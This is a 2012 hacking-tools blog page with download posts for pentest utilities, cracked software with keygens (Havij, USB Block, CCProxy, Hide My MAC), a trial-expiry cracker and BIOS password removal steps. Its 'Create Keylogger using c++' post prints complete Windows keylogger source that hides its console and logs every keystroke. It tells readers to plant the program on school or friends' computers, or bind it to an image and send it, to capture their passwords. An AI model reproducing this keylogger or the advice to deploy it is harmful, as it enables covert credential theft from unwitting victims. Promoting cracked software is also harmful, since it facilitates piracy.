Showing posts with label latest hacking tools. Show all posts
Showing posts with label latest hacking tools. Show all posts

Monday, May 7, 2012

Increase and Boost uTorrrent speed with utorrent turbo booster

Comments

All of us use uTorrent for downloading movies, games, softwares and many other stuff from the Internet. So if you use uTorrent, we have a tool called “uTorrent Turbo Booster” that will increase your downloads speed manifold. Try the tool and leave your comments if it was really useful.






Monday, April 30, 2012

WebSPLOIT tool kit 1.6 version released

Comments
WebSploit is an open source project which is used to scan and analysis remote system in order to fnd various type of vulnerabilites. This tool is very poerful and support multiple vulnerabilities. All the scripts of this tool is written on the python and users can also modify the source code to customize the working according to their need.


These are main vulnerabilities which can be found and exploited with the help of this tool


Description :

  • Autopwn - Used From Metasploit For Scan and Exploit Target Service
  • wmap - Scan,Crawler Target Used From Metasploit wmap plugin
  • format infector - inject reverse & bind payload into file format
  • phpmyadmin - Search Target phpmyadmin login page
  • lfi - Scan,Bypass local file inclusion Vulnerability & can be bypass some WAF
  • apache users - search server username directory (if use from apache webserver)
  • Dir Bruter - brute target directory with wordlist
  • admin finder - search admin & login page of target
  • MLITM Attack - Man Left In The Middle, XSS Phishing Attacks
  • MITM - Man In The Middle Attack
  • Java Applet Attack - Java Signed Applet Attack
  • MFOD Attack Vector - Middle Finger Of Doom Attack Vector
  • USB Infection Attack - Create Executable Backdoor For Infect USB For Windows


            Read More


Download

Thursday, April 5, 2012

SSLyze v0.4 Realeased - SSL Server configuration scanner download

Comments
SSLyze v0.4 is released and available for download. SSLyze is a fast SSL scanner which scans and analyze the SSL configuration of servers. This tool support OpenSSL 1.0.1 and TLS 1.1 and 1.2 and detect security holes. Supports cipher suites scanning, insecure renegotiation verification, session resumption testing, client certificates, and more. It is based on OpenSSL and a custom SSL Python wrapper.
It is tested on various platforms including Python 2.6 & 2.7 with Ubuntu and Windows 7, both 32 and 64 bits. It will also work on lower platforms mentioned.


New in v0.4


Support for OpenSSL 1.0.1 and TLS 1.1 and 1.2 scanning. See –tlsv1_1 and –tlsv1_2.
Support for HTTP CONNECT proxies. See –https_tunnel.
Support for StartTLS with SMTP and XMPP. See –starttls.
Improved/clarified output.
Various bug fixes.

Wednesday, March 7, 2012

Download havji 1.15 pro with crack

Comments






Instruction:
---------------



1:>Run Havij.exe

2:> Once it opens you will see register..








3:> Click Register Make sure you are connected to the internet






4:> Under Name: You write:Your Name or anything
5:>Under File: You select the folder where you are currently running the Havij program from and select Havij Key


6:> Done....

any problem comment here????

Wednesday, February 29, 2012

How To COMPRESS 1GB files into 10 MB...!!!!

Comments
As you all know that even your Operating system has file compressing, but it compresses only to a certain limit. For minimum size file compressing, you can use KGB Achiever. It is a file archiever and data compression utility. We can compress 1 GB file into just 10 MB using KGB Archiever.

                                                 

This reduces your hard disk space too. Archives can be made in either KGB or Zip format. And also you can secure them by a password. KGB Achiever is perfect to get extraordinary compression results.


                                           Click here to Download KGB Archiver


comment here if you have any problem??
bikash


Monday, February 27, 2012

USB Block 1.5.0 with serial key

Comments


                                            


                                       USB.Block.1.5.0 || File Size : 3.91 MB.


Key Benefits

Prevent theft of your data: Prevent leakage and copy of your data to USB Drives, External Drives, CDs/DVDs or other such portable devices. Install once and block ALL such drives and devices that do not belong to you. Share your PC without the fear of data theft.


Simple and Effective Device List Management Console: Actively maintain a list of all blocked devices, drives, unauthorized log attempts, uninstall attempts, and invalid password attempts.


Data Leak Prevention at its Best:Use USB Block to protect your data and information against data-leak & data theft. If you leave your computer unattended for long periods of time or if your work environment requires you to actively maintain confidentiality of company data, then you need USB Block!


Strong Monitoring Of All Activities:You can also check Reports & Logs by running the application to regularly monitor which device was authorized, when and by whom. USB Block uses robust data leak prevention technology and ensures complete security of your files at all times.


Protect your PC from Viruses and Spyware: With USB Block, you're in full control of who can access your files and folders. Any malicious attempts by hackers or crackers to install unwanted spying software on your computer can also be prevented with USB Block.

  • Complete Data Integrity
  • Block unauthorized USB Drives
  • Block unauthorized CDs/DVDs
  • Block unauthorized Network Access
  • Block unauthorized Drives & Partitions
  • Save Your Data
  • Prevent Data Leakage from your PC
  • Prevent misuse of your data
  • Prevent viruses & malware attacks
  • Prevent hackers, crackers and thieves
  • Hack Monitoring 
  • Monitor program deletion attempts
  • Monitor fake password attempts
  • Monitor illegal uninstall attempts
  • Catch the culprit red-handed


                   

                               


                      


                                  


                                      


                                 


                                  


                               


                                



                       Download : USB.Block.1.5.0

Saturday, February 18, 2012

how to remove BIOS password on desktops/laptops

Comments

Hey Friends ! Today I'll show u, how to remove CMOS / BIOS password from computer using motherboard..!
Step 1. Find the BIOS/CMOS jumper on motherboard
Step 2. Remove the jumper from the side and put it in opposite empty side...
Step 3. Start computer hen Off the computer
Step 4. Remove the jumper from. the empty side..and put opposite side..!

Your BIOS/CMOS Password has been removed..,! ;)
Note: U have Old motherboard P1,P2, P3 & Suppose P4 then if you don't get that jumper on motherboard, then remove the CMOS Battery.
Then repeat Step3 n then put that cmos cell on motherboard

Tuesday, February 14, 2012

FREE download Yersinia

Comments
Yersinia is a network tool designed to take advantage of some weakeness in different network protocols. It pretends to be a solid framework for analyzing and testing the deployed networks and systems.
hacking tools
Yersiniadownload
Websitehttp://www.yersinia.net/
Download Pagehttp://www.yersinia.net/download.htm

Sunday, February 12, 2012

Hide My MAC v2.2 with crack download

Comments


Hide My MAC Address v2.2 + Crack || File Size : 1.11 MB. 



Hide your MAC Address from hackers, government agencies, your ISP, WiFi networks, online games, and more! Anyone with the right tools can track your Internet activity if they know your MAC Address. Public Wireless Access Points are all over, some less secure than others. Every time you open your laptop, it automatically attempts to contact to wireless networks, regardless if you use WEP/WPA Encryption. Fool MAC-based ACLs (Access Control Lists) by cloning the MAC address of a computer that is already authorized to use a WiFi network. Don't let your MAC Address to get out in the open, download Hide My MAC Address now.

Benefits & Features

-Change your MAC Address with only one click!
-Prevent online games from banning you based on your MAC Address.
-Clone the MAC Address of another computer. Bypass some ISP registration requirements.
-Get back into online games that banned you based on your MAC Address.
-Hide your real MAC Address from hackers, WiFi networks, and ISPs.

Installation

1. Unpack rar archive
2. Run installer Hide My MAC Address v2.2.exe
3. Enjoy. 



CCProxy 7.2 incl Key MAker

Comments


Proxy Server CCProxy is easy-to-use and powerful Internet connection sharing software.

CCProxy can support broadband, DSL, dial-up, optical fiber, satellite, ISDN and DDN connections, it helps you build your own proxy server and share Internet access within the LAN efficiently and easily.

CC Proxy Server can act as an HTTP, mail, FTP, SOCKS, news and telnet proxy server. It features powerful account management functions, including Internet access control, bandwidth control, Internet web filtering, content filtering and time control. It also provides web caching, online access monitoring, access logging and bandwidth usage statistics functions. CC Proxy is compatible with Win98, WinME, WinNT, Win2000, WinXP, Win2003 and Vista.

The first version of Proxy Server CCProxy was developed in June 2000.

It was initially designed to modem sharing within a LAN. Proxy Server CCProxy has now been expanded to support Internet connections of many other types, such as DSL sharing, cable modem sharing, wireless sharing, satellite sharing, parent proxy server connection sharing, and more. If there is a computer within a LAN that can access the Internet, all the other computers within the LAN can access the Internet via this proxy server software. This could make great savings for your business in terms of hardware and Internet connection fees.

CCProxy can act as web proxy software, which enables you to browse web pages, download files and send and receive e-mails via web browsers such as IE, Firefox, Netscape and etc. The web caching function can increase the Internet surfing speed.

CCProxy provides powerful management functions including several ways to control the Internet access on the LAN. They are IP address, IP range, MAC address, User Name/Password and group. It can also merge with Active Directory.

The web filtering and content filtering function can restrict clients' access to particular sites. It will help you to ensure that employees concentrate on their work or that children are unable to visit unsuitable sites. The time schedule function is used to control the users' online time.

Different proxy services can be allocated to different users. For example, some of them could be restricted to browsing web pages and others to sending and receiving e-mails.

CCProxy can allocate proxy client bandwidth as appropriate. That is to say, it can be used to control the users' Internet surfing speed and balance the bandwidth to avoid the network traffic jams that can be caused by users who download big files or watch online media.

Access logging and online access monitoring will help you record the clients' Internet access activities.

Proxy Server CCProxy Main Features

   Modem, Cable Modem, ISDN, ADSL, Satellite, DDN and so on are supported(more).
   HTTP, FTP, Gopher, SOCKS4/5, Telnet, Secure (HTTPS), News (NNTP), RTSP and MMS proxy are supported.
   Port Mapping is supported.
   Web cache can enhance browsing speed. The size and refresh time of the cache can be easily changed.
   Bandwidth control flexibly manages the traffic usage of clients.
   Time schedule can easily control the clients' on-line time(access time control).
   Web filter can ban the specified web sites or content, It can also name specific web sites for browsing.
   URL filtering prevents users from downloading files with designated extensions via IE.
   There are seven types of account authentication: IP address, IP range, MAC address, User Name/Password, IP + User Name/Password, MAC + User Name/Password and IP + MAC.
   Parent proxy function enables CCProxy to access the Internet via another proxy.
   Dial-On-Demand, remote dial up and auto disconnect are supported.
   Access Logging can keep a full record of the Internet access log.
   It enables IE and Netscape to access the Internet through HTTP/Secure/FTP (Web)/Gopher.
   SOCKS5 proxy support allows use of ICQ, MSN Messenger, Yahoo Messenger, CuteFTP, CuteFTP Pro and WS-FTP.
   Mail proxy supports Outlook, Eudora etc.
   Supports NetTerm accessing the Internet via Telnet proxy.
   Supports Outlook connecting to the News server via News proxy.
   Support SOCKS5 and web authentication.
   Support for Real Player RTSP proxy and Media Player MMS proxy.
   Built-in DNS can resolve domain names.
   Win98/WinMe/WinNT/Win2000/WinXP/Win2003/Vista compatible.
   Bandwidth usage statistics.

Installation
Unpack, install, Use KeyMaker to Generate Key and Register
Enjoy







I Check it with McAfee VirusScan Enterprise , it Is clean.

Friday, February 10, 2012

SUPERSCAN free download

Comments
SuperScan
SuperScan is an user-friendly tool for cleaning the junk files.Only click your mouse, it clean all the junk files quickly and safely


hacking tools
SuperScandownload
Websitehttp://www.snapfiles.com/publishers/foundstone-inc/index.html
Download Pagehttp://www.snapfiles.com/download/dlsuperscan.html
File size196 kb
LicenseFreeware
Operating SystemWindows 2000/XP

any problem comment here....

Create Keylogger using c++

Comments
Hi friends, the most interesting part of the hacking is spying. Today i am going to introduce to the C++ Spyware code. It is going to be very fun. You can install this spyware in your college/school or in your friend system, and get their username and passwords. This is very simple hacking trick when compared to phishing web page.





Disadvantage of Phishing Web page:


You have to upload phishing web page to web hosting. But only few website won't detect the phishing webpage. website URL is different. Easy to detect that we are hacking.
Advantage of Spyware-keylogger:

Very simple and easy method.
Victim can't detect that we are hacking.

How to create Keylogger using Visual C++?

Requirements:

Dev C++. Download it from here: http://www.bloodshed.net/
Knowledge about Visual C++(need, if you are going to develop the code).

Install dev C++ in your system and open the dev C++ compiler.
Go to File->New->Source File.
you can see a blank works space will be there in window.
now copy the below keylogger code into the blank work space.



#include
using namespace std;
#include
#include
int Save (int key_stroke, char *file);
void Stealth();

int main()
{
Stealth();
char i;

while (1)
{
for(i = 8; i <= 190; i++)
{
if (GetAsyncKeyState(i) == -32767)
Save (i,"LOG.txt");
}
}
system ("PAUSE");
return 0;
}

/* *********************************** */

int Save (int key_stroke, char *file)
{
if ( (key_stroke == 1) || (key_stroke == 2) )
return 0;

FILE *OUTPUT_FILE;
OUTPUT_FILE = fopen(file, "a+");

cout << key_stroke << endl;

if (key_stroke == 8)
fprintf(OUTPUT_FILE, "%s", "[BACKSPACE]");
else if (key_stroke == 13)
fprintf(OUTPUT_FILE, "%s", "\n");
else if (key_stroke == 32)
fprintf(OUTPUT_FILE, "%s", " ");
else if (key_stroke == VK_TAB)
fprintf(OUTPUT_FILE, "%s", "[TAB]");
else if (key_stroke == VK_SHIFT)
fprintf(OUTPUT_FILE, "%s", "[SHIFT]");
else if (key_stroke == VK_CONTROL)
fprintf(OUTPUT_FILE, "%s", "[CONTROL]");
else if (key_stroke == VK_ESCAPE)
fprintf(OUTPUT_FILE, "%s", "[ESCAPE]");
else if (key_stroke == VK_END)
fprintf(OUTPUT_FILE, "%s", "[END]");
else if (key_stroke == VK_HOME)
fprintf(OUTPUT_FILE, "%s", "[HOME]");
else if (key_stroke == VK_LEFT)
fprintf(OUTPUT_FILE, "%s", "[LEFT]");
else if (key_stroke == VK_UP)
fprintf(OUTPUT_FILE, "%s", "[UP]");
else if (key_stroke == VK_RIGHT)
fprintf(OUTPUT_FILE, "%s", "[RIGHT]");
else if (key_stroke == VK_DOWN)
fprintf(OUTPUT_FILE, "%s", "[DOWN]");
else if (key_stroke == 190 || key_stroke == 110)
fprintf(OUTPUT_FILE, "%s", ".");
else
fprintf(OUTPUT_FILE, "%s", &key_stroke);

fclose (OUTPUT_FILE);
return 0;
}

/* *********************************** */

void Stealth()
{
HWND Stealth;
AllocConsole();
Stealth = FindWindowA("ConsoleWindowClass", NULL);
ShowWindow(Stealth,0);
}


Compile the Code(Ctrl+F9)



                    





                   

Now execute the program by selecting Execute->Run(ctrl+F10)


Now your key logger will run in your system. whatever you type using keyboard. It will be stored in Log.txt file.You can see the log.txt file where you save the file.


                


                    


Bind the exe file with image or any files and send it to your friend.
(or)
If you have physical access to your college/school system,then copy the exe file in that system and run it.
if you have any problem comment here...
bikash

Wednesday, February 8, 2012

Cain & Abel hacking tool free download

Comments
Cain & Abel is a password recovery tool for Microsoft Operating Systems. It allows easy recovery of several kind of passwords by sniffing the network, cracking encrypted passwords using Dictionary, Brute-Force and Cryptanalysis attacks, recording VoIP conversations, decoding scrambled passwords, recovering wireless network keys, revealing password boxes, uncovering cached passwords and analyzing routing protocols. 


            hack


Cain & Abel download
Website http://www.oxid.it/cain.html
Download Page http://www.oxid.it/cain.html
File size 660 KB
License Freeware
Operating System Windows iNT/2000/XP
hope you enjoy it.....

Advance Port ScannerDownload free

Comments
             Advanced Port Scanner
This is small size, very fast and simple for use port scanner . Just type IP Addresses of the computer , that you want to scan and you´ll get detailed descriptions for common ports.


             hack



Advanced Port Scanner download
Website http://www.radmin.com/products/utilities/portscanner.php
Download Page http://www.download.com/Advanced-Port-Scanner
File size 426 KB
Operating System Windows 95/98/ME/NT4.0/2000/XP/2003/Vista/2008
License: Free
hope you enjoy it
bikash

Sunday, February 5, 2012

Date cracker 2000 free download

Comments
Hi readers
i am going to post about a cracking tool for windows 
DATE CRACKER 2000

Data Cracker 2000 is an application which can easily remove the date protection(i.e. trailprotection) from many software. It is very useful for shareware or trial versions of software which expire after a specific date. When you crack the software with Date Cracker 2000, the software will always show something like “There are 90 days remaining in your trial period” and the software will actually last forever :). Some programs have good protection and it isn’t possible to remove their date protection .


                   
Date Cracker 2000download
Websitewww.e-tech.ca/003-dc2000.asp
Download Pagehttp://www.wonderworks.ca/nbia/dc20000.zip
File size1.5 MB
Video Tutorialhttp://www.wonderworks.ca/nbia/dc2000.wmv



any problem comment here...

Related Posts Plugin for WordPress, Blogger...